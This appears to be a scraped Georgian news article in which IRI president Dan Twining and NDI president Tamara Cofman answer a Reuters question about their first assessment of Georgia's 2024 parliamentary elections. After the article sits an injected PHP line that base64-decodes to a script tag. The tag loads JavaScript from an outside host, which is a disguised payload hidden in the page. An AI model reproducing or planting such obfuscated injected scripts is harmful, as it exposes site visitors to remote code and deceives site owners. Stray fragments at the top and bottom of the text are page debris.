celsiusi
ავერსი შნაიდერი

ამერიკული ორგანიზაციები, „საერთაშორისო რესპუბლიკური ინსტიტუტი“ (IRI) და „ეროვნულ-დემოკრატიული ინსტიტუტი“ (NDI), რომელთაც ერთობლივი სადამკვირვებლო მისია ჰქონდათ, 2024 წლის საპარლამენტო არჩევნებზე პირველად შეფასებას ავრცელებენ. 

შეფასების შემდეგ, ორგანიზაციის წევრებმა მედიის კითხვებს უპასუხეს.

Reuters: თუ შეიძლება, მკაფიოდ მითხარით, ფართოდ გავრცელებული ბრალდებები ძალადობის შესახებ ახდენს გავლენას საბოლოო შედეგზე, თუ არ არის საკმარისი იმისთვის, რომ საბოლოო შედეგზე ჰქონოდა გავლენა?

საერთაშორისო რესპუბლიკური ინსტიტუტის (IRI) პრეზიდენტი დენ ტვინინგი:

"საარჩევნო პროცესი ჯერ კიდევ მიმდინარეობს. ჩვენ, ოცი გრძელვადიანი დამკვირვებელი გვყავდა საქართველოში, რომელიც ივლისიდან აკვირდებოდა საარჩევნო პროცესს. ჩვენ დავაფიქსირეთ ბევრი ნაკლოვანება და არათანაბარი გარემო, როგორც წინასაარჩევნო პროცესში, ასევე არჩევნების დღეს. თუმცა ჯერ არ გვაქვს საბოლოო შედეგები და ველოდებით ამას. ასევე, გვექნება არჩევნების შემდგომი პერიოდი, როცა დავები და საჩივრები იქნება სასამართლო დონეზე. რა თქმა უნდა, NDI-ის ექნება თავისი პასუხი. ჩემი პასუხი კი არის ის, რომ ეს იყო ბევრი ნაკლოვანებით დატვირთული არჩევნები, თუმცა ეს საბოლოოდ უნდა გადაწყვიტოს საქართველოს მოსახლეობამ ფაქტებზე დაყრდნობით".

NDI-ის პრეზიდენტი თამარა ქოფმანი:

"მეთოდოლოგია, რომელსაც ჩვენ ამ შეფასებაში ვიყენებთ, ითვალისწინებს მთელს საარჩევნო პროცესს. ერთიან სურათს განვიხილავთ, რადგან მხოლოდ საარჩევნო დღე ვერ იძლევა პასუხს. უნდა შევხედოთ წინასაარჩევნო პერიოდსაც".

88
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");